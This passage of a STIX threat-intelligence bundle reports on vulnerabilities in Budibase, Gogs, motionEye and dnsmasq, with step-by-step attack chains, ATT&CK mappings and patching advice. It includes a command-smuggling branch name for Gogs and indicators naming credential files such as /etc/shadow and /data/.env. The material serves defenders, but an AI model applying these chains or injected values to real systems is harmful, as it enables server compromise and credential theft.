process startup to automatically protect built-in objects from prototype pollution, which helps mitigate CVE-2026-48170.\n",
      "published": "2026-07-03T11:02:23Z",
      "labels": [
        "prototype-pollution",
        "cve",
        "node.js",
        "scim",
        "critical-vulnerability"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9m6g-wc8r-q59c"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/1321.html"
        }
      ],
      "confidence": 95
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--fd43182c-85dc-5f4f-82a4-177f8b7d3eb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: /data/.env",
      "pattern": "[x-ti-bot:file_path = '/data/.env']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:01:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1fea6e59-2112-5a31-b1d8-5a3e64cdd3e8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "indicator--fd43182c-85dc-5f4f-82a4-177f8b7d3eb2"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--33a02dd5-594e-51cb-9db5-9fb3a106ab35",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: /etc/passwd",
      "pattern": "[x-ti-bot:file_path = '/etc/passwd']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:01:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0d61a199-f330-5efe-81f0-4c96642d1542",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "indicator--33a02dd5-594e-51cb-9db5-9fb3a106ab35"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--21d840ef-a179-5a68-b6e9-3607b5ca5768",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "file_path: /etc/shadow",
      "pattern": "[x-ti-bot:file_path = '/etc/shadow']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T11:01:14Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--1640c12f-c11f-5a50-ba91-251017af99cd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "indicator--21d840ef-a179-5a68-b6e9-3607b5ca5768"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--386b91b0-f777-5f6e-90e7-3afe5289d804",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--96794178-4e06-5aec-a8a7-e93763a7b676",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--56570824-6228-5c79-9e42-10c5e5035524",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ed570fa7-b83a-5b0d-b05c-294d5b98b2ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--beb1d0f0-4a9a-521e-8751-b9abb956d652",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Budibase Arbitrary File Read Vulnerability via PWA-zip Symlink Upload (CVE-2026-54352)",
      "description": "## Overview\n\nA critical arbitrary file read vulnerability (CVE-2026-54352) affects Budibase server versions up to `3.39.0` (HEAD `feab995`, released 2026-05-20). This flaw allows an authenticated workspace builder to read any file accessible by the server process, including highly sensitive configuration files like `/data/.env` (containing `JWT_SECRET`, `INTERNAL_API_KEY`, and database credentials) and system files such as `/etc/passwd` or `/etc/shadow`. The vulnerability stems from improper handling of symbolic links within uploaded PWA `.zip` files by the `extract-zip@2.0.1` library, coupled with insufficient validation in Budibase's icon processing logic. When exploited, it can lead to credential disclosure, privilege escalation to global administrator, and even cross-tenant exposure in multi-tenant environments. This vulnerability impacts self-hosted Budibase deployments, especially those running the default Docker image where the Node server executes as `root`.\n\n## Attack Chain\n\n1.  An attacker gains authenticated access as a workspace builder to a Budibase instance, obtaining necessary cookies and CSRF tokens from `GET /api/global/self`.\n2.  The attacker crafts a `.zip` archive containing a symbolic link, for example, `evil.png`, which targets a sensitive file on the server's filesystem, such as `/data/.env`.\n3.  The attacker includes an `icons.json` file within the `.zip` that references the created symbolic link, for example, `{\"icons\":[{\"src\":\"evil.png\", ...}]}`.\n4.  The attacker sends an HTTP POST request to `/api/pwa/process-zip` with the crafted `.zip` file in the request body, using their authenticated session.\n5.  The Budibase server, using `extract-zip@2.0.1`, extracts the `.zip` file into a temporary directory, preserving the absolute target of the symbolic link.\n6.  During PWA icon processing, the server's validator (`packages/server/src/api/controllers/static/index.ts:259-268`) resolves the icon path, follows the symbolic link using `fs.existsSync`, and then opens the target file using `fsp.open` to stream its content.\n7.  The content of the sensitive target file (e.g., `/data/.env`) is then streamed into MinIO and made available via a new public URL, typically `GET /api/assets/{appId}/pwa/{uuid}.png`.\n8.  The attacker retrieves the sensitive file's content by making a GET request to the newly generated PWA asset URL, completing the arbitrary file read.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54352 leads to the disclosure of critical secrets from the Budibase server's host system. This includes `JWT_SECRET`, `INTERNAL_API_KEY`, `MINIO_ACCESS_KEY`, `MINIO_SECRET_KEY`, `REDIS_PASSWORD`, `COUCHDB_PASSWORD`, and `DATABASE_URL` from the `/data/.env` file. With the leaked `JWT_SECRET`, an attacker can forge HS256 JWTs, escalating privileges from a workspace builder to a global administrator. This allows for full compromise of the Budibase instance, including potential cross-tenant data access on multi-tenant installations. Furthermore, if the Budibase Docker container runs as `root` (the default configuration), system files like `/etc/passwd` and `/etc/shadow` are also exposed, providing additional credential harvesting opportunities.\n\n## Recommendation\n\n*   Immediately update Budibase server to version `3.39.9` or newer to patch CVE-2026-54352.\n*   Rotate all credentials found in `/data/.env`, including `JWT_SECRET`, `INTERNAL_API_KEY`, `MINIO_*`, `REDIS_PASSWORD`, `COUCHDB_PASSWORD`, and `DATABASE_URL`, especially if using self-hosted Budibase deployments.\n*   Implement strong logging and monitoring for attempts to access sensitive file paths mentioned in the IOCs (e.g., `/data/.env`, `/etc/passwd`, `/etc/shadow`) via unexpected application endpoints.\n*   Ensure that the Budibase server process does not run with `root` privileges within its container or host environment, following the principle of least privilege, to limit the blast radius of arbitrary file read vulnerabilities.\n",
      "published": "2026-07-03T11:01:14Z",
      "labels": [
        "arbitrary-file-read",
        "web-vulnerability",
        "privilege-escalation",
        "credential-access",
        "symlink",
        "budibase",
        "cloud",
        "saas"
      ],
      "object_refs": [
        "indicator--fd43182c-85dc-5f4f-82a4-177f8b7d3eb2",
        "indicator--33a02dd5-594e-51cb-9db5-9fb3a106ab35",
        "indicator--21d840ef-a179-5a68-b6e9-3607b5ca5768",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-w7mq-r738-x278"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36c7c359-5601-51ab-8e88-176d9dfe7aa7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b32ab581-6b5a-53fb-99b2-4425f462481a",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e053c866-f22e-5ce7-82ed-427dcff42f64",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b32ab581-6b5a-53fb-99b2-4425f462481a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6fbaec78-64dc-5f7b-a99e-490250e68f07",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b32ab581-6b5a-53fb-99b2-4425f462481a",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hide Artifacts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1564",
          "url": "https://attack.mitre.org/techniques/T1564"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bc455ce0-c947-5172-81fb-6f0cad739a79",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b32ab581-6b5a-53fb-99b2-4425f462481a",
      "target_ref": "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data Manipulation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1565",
          "url": "https://attack.mitre.org/techniques/T1565"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--be0cb829-faf8-53f8-b1bf-10f1b1d7251c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b32ab581-6b5a-53fb-99b2-4425f462481a",
      "target_ref": "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b32ab581-6b5a-53fb-99b2-4425f462481a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gogs Remote Code Execution via git rebase --exec Argument Injection (GHSA-qf6p-p7ww-cwr9)",
      "description": "## Overview\n\nA critical Remote Code Execution (RCE) vulnerability, identified as GHSA-qf6p-p7ww-cwr9, affects Gogs, the self-hosted Git service, specifically versions 0.14.2, 0.15.0+dev (prior to commit `b53d3162`), and all prior versions supporting \"Rebase before merging\" merge styles. This vulnerability allows any authenticated user to achieve RCE on the underlying server by crafting a malicious branch name that injects the `--exec` flag into the `git rebase` command during a pull request merge. The exploit results in privilege escalation from a regular user to server-level code execution, enabling full compromise, cross-tenant data breaches, and supply chain attacks. The severity is heightened by Gogs's default open registration (`DISABLE_REGISTRATION = false`) and the fact that any user can create a repository and enable the \"Rebase before merging\" option without administrator intervention, effectively making the vulnerability exploitable with minimal prerequisites and leaving minimal traces in logs.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker obtains an authenticated account on the Gogs instance, either through open registration or by compromising existing credentials.\n2.  **Repository Setup**: The attacker creates their own repository (or gains write access to one where \"Rebase before merging\" is enabled) and then enables the \"Rebase before merging\" option in the repository settings.\n3.  **Malicious Branch Creation**: The attacker creates a new branch in their repository with a specially crafted name, such as `--exec=touch${IFS}/tmp/rce_proof`, which abuses the `git rebase --exec` argument.\n4.  **Pull Request Submission**: The attacker creates a pull request (PR) targeting their own repository's base branch from their malicious branch.\n5.  **Merge Operation Initiation**: The attacker initiates the \"Rebase before merging\" operation for the malicious pull request through the Gogs web interface.\n6.  **Remote Code Execution**: During the rebase process, Gogs executes the `git rebase` command with the attacker's crafted branch name. Git interprets `--exec=...` as an argument, causing the embedded command (`touch /tmp/rce_proof` or a base64-encoded payload) to execute on the Gogs server as the Gogs process user (typically `git`).\n7.  **Server Compromise/Impact**: Despite a subsequent `git checkout` failure leading to an HTTP 500 error in Gogs, the RCE has already successfully completed, giving the attacker full control over the server.\n\n## Impact\n\nSuccessful exploitation of this vulnerability leads to severe consequences, including full server compromise. An attacker gains arbitrary command execution as the Gogs process user, which can lead to cross-tenant data breaches, allowing them to read all repositories on the instance, including other users' private code. This can also facilitate credential theft, providing access to password hashes, API tokens, SSH keys, and 2FA secrets for every user. Furthermore, the attacker can use the compromised server for lateral movement into other internal systems and can conduct supply chain attacks by silently modifying any hosted repository's code. This critical vulnerability affects all Gogs installations regardless of the operating system (Linux, macOS, Windows) or deployment method (binary, Docker, source), posing a significant threat to the integrity and confidentiality of code hosted on Gogs instances.\n\n## Recommendation\n\n*   **Patch Immediately**: Upgrade Gogs to a version that contains the fix for GHSA-qf6p-p7ww-cwr9. As of the advisory, a patch was not explicitly mentioned, but the issue is tied to `b53d3162` commit. Monitor Gogs releases for official patch availability.\n*   **Implement Process Monitoring**: Deploy the Sigma rule in this brief to your SIEM to detect `git rebase` commands containing the `--exec=` argument. Ensure your endpoint detection and response (EDR) or Sysmon configuration captures process creation events, including command-line arguments and parent-child relationships, on Gogs server hosts.\n*   **Review Gogs Configuration**: If patching is not immediately possible, consider disabling the \"Rebase before merging\" option globally or restricting user permissions to prevent its enablement on repositories until a patch is applied.\n*   **Monitor Gogs Application Logs**: Regularly review Gogs application logs for error messages indicating `git checkout '--exec=\u003c...\u003e': exit status 128 - error: unknown option \\`exec=\u003c...\u003e''`, which signifies a post-RCE attempt to check out the malicious branch.\n",
      "published": "2026-07-03T11:00:08Z",
      "labels": [
        "rce",
        "gogs",
        "git",
        "code-repository",
        "vulnerability",
        "argument-injection",
        "server-side-request-forgery"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--78ac3757-7782-5464-9fac-0e8faa621d9c",
        "attack-pattern--625bcfd0-9318-5abf-8fe9-295efe008e12"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qf6p-p7ww-cwr9"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--39469b58-455d-5e3f-b3c0-11d6d630b681",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64e15515-7d3b-503f-93bd-0d31ebb34af4",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c529fd82-7b23-5c86-a75e-91ea4c1306ca",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64e15515-7d3b-503f-93bd-0d31ebb34af4",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--18c94d09-546d-57f2-8d12-06a0d7cfea8d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64e15515-7d3b-503f-93bd-0d31ebb34af4",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hijack Execution Flow",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1574",
          "url": "https://attack.mitre.org/techniques/T1574"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--21048a39-1bb6-5866-8892-849ef5489607",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64e15515-7d3b-503f-93bd-0d31ebb34af4",
      "target_ref": "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cb3e4c9-4073-5ca6-8e03-349c93d6ff7c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--64e15515-7d3b-503f-93bd-0d31ebb34af4",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--64e15515-7d3b-503f-93bd-0d31ebb34af4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "motionEye: LFI → Pass-the-Hash Admin → Unsafe Restore → Unauthenticated Action Execution (RCE)",
      "description": "## Overview\n\nA critical multi-stage vulnerability chain in motionEye, affecting versions prior to 0.44.0, allows for unauthenticated remote code execution (RCE) under specific conditions. Attackers can exploit an arbitrary file read (Local File Inclusion or LFI) via the `picture/\u003cid\u003e/download` endpoint, specifically for local motion cameras, to extract sensitive configuration data like the admin password hash. This hash can then be used to forge authentication signatures, granting admin access without the plaintext password (a \"pass-the-hash\" technique). Subsequently, an unsafe configuration restore function, which extracts attacker-controlled tarballs into the `CONF_PATH` without proper sanitization, can be abused to drop malicious executables. Finally, an unauthenticated action execution endpoint allows for the immediate execution of these injected files, leading to full system compromise. This chain can be exploited unauthenticated if the normal user password is unset, or as an authenticated normal user to escalate to RCE.\n\n## Attack Chain\n\n1.  **Identify Local Camera ID**: The attacker first identifies or creates a local motion camera ID, which is a prerequisite for exploiting the vulnerable LFI path in `picture/\u003cid\u003e/download`.\n2.  **Arbitrary File Read (LFI)**: The attacker sends a request to `/picture/\u003cid\u003e/download/\u003cabsolute_path\u003e` (e.g., `/picture/1/download/%2Fetc%2Fhosts`) to read arbitrary files from the motionEye server's filesystem.\n3.  **Extract Admin Hash**: Using the LFI, the attacker reads the motionEye configuration file (e.g., `/etc/motioneye/motion.conf`) to obtain the SHA1 hash of the `@admin_password`.\n4.  **Achieve Admin Access**: The attacker computes a valid authentication signature for `/config/restore?_username=admin` using the stolen admin password hash as the key, bypassing standard authentication and gaining administrative privileges.\n5.  **Upload Malicious Archive**: The attacker uploads a crafted tar archive containing an executable file named `lock_\u003cid\u003e` (or any valid action for a camera ID) via the now-accessible `/config/restore` endpoint. This executable is extracted into `CONF_PATH`.\n6.  **Execute Malicious Action**: The attacker sends an unauthenticated POST request to `/action/\u003cid\u003e/lock`. The motionEye server executes the previously injected `lock_\u003cid\u003e` file via `subprocess.Popen`, resulting in remote code execution.\n7.  **Impact**: The injected action creates a marker file `/tmp/meye_rce_ok`, confirming successful remote code execution.\n\n## Impact\n\nSuccessful exploitation of this vulnerability chain leads to critical consequences. If the normal user password is unset (a common default in some installations), an unauthenticated attacker can achieve full Remote Code Execution (RCE) on the motionEye server. If a normal user password is set, an authenticated normal user can escalate their privileges to admin and then achieve RCE. This allows for arbitrary file read on the server's filesystem and full compromise of the motionEye process account, potentially leading to data exfiltration, service disruption, or further network penetration. The impact in observed testing included creating arbitrary files on the filesystem.\n\n## Recommendation\n\n*   **Patch motionEye**: Immediately update all motionEye installations to version 0.44.0 or newer to address the vulnerabilities in `motioneye/motioneye/handlers/picture.py`, `motioneye/motioneye/mediafiles.py`, `motioneye/motioneye/handlers/base.py`, `motioneye/motioneye/config.py`, and `motioneye/motioneye/handlers/action.py`.\n*   **Implement Rule `motioneye_rce_action_execution`**: Deploy the provided Sigma rule to detect suspicious process creation originating from the `motioneye` service account, indicating potential RCE.\n*   **Review `CONF_PATH` Permissions**: Ensure that the `CONF_PATH` (typically `/etc/motioneye`) has restrictive write permissions, limiting write access only to the necessary motionEye process account.\n*   **Regularly Review motionEye Logs**: Monitor `motioneye` service logs for unusual activity, especially for failed authentication attempts, unexpected file accesses, or process creations from the `motioneye` user.\n",
      "published": "2026-07-03T10:57:41Z",
      "labels": [
        "RCE",
        "LFI",
        "motioneye",
        "vulnerability",
        "unauthenticated",
        "privilege-escalation"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--ef5045e6-d78f-5963-9f19-c068d08d2597",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qxvg-h7q2-hcxh"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--023fc915-8c98-5fa0-b92d-c99473a7a04c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--87670e6d-20a7-5289-9e89-a2adc1d16bc2",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--87670e6d-20a7-5289-9e89-a2adc1d16bc2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "dnsmasq Vulnerability Enables Denial of Service",
      "description": "## Overview\n\nThe German Federal Office for Information Security (BSI) has issued an advisory regarding a vulnerability in dnsmasq that could allow for a Denial of Service (DoS) attack. A remote, unauthenticated attacker can exploit this flaw to disrupt the availability of services relying on dnsmasq. While specific exploit details or a concrete attack chain have not been publicly disclosed in the advisory, the potential impact of a DoS on critical DNS or DHCP infrastructure can be significant for organizations. Dnsmasq is widely used in various environments, including home routers, embedded devices, and as a lightweight DNS/DHCP server in corporate networks, making this vulnerability a concern for a broad range of systems. Defenders should prioritize patching to prevent potential service disruptions.\n\n## Impact\n\nA successful Denial of Service attack against dnsmasq would render critical network services, such as DNS resolution or DHCP assignments, unavailable. This disruption could lead to widespread network outages, preventing users and systems from accessing internal and external resources, thereby severely impacting business operations. While no specific victim counts or targeted sectors were mentioned in the advisory, any organization utilizing dnsmasq could be affected, with the severity of impact depending on the role dnsmasq plays in their infrastructure.\n\n## Recommendation\n\n*   Immediately update dnsmasq to the latest patched version to address the vulnerability.\n*   Monitor dnsmasq service logs for unusual activity, high resource consumption, or unexpected restarts, which may indicate a DoS attempt.\n*   Implement rate limiting and access controls for dnsmasq services to mitigate the impact of potential DoS attacks.\n",
      "published": "2026-07-03T10:56:33Z",
      "labels": [
        "vulnerability",
        "dos",
        "network",
        "linux"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2036"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
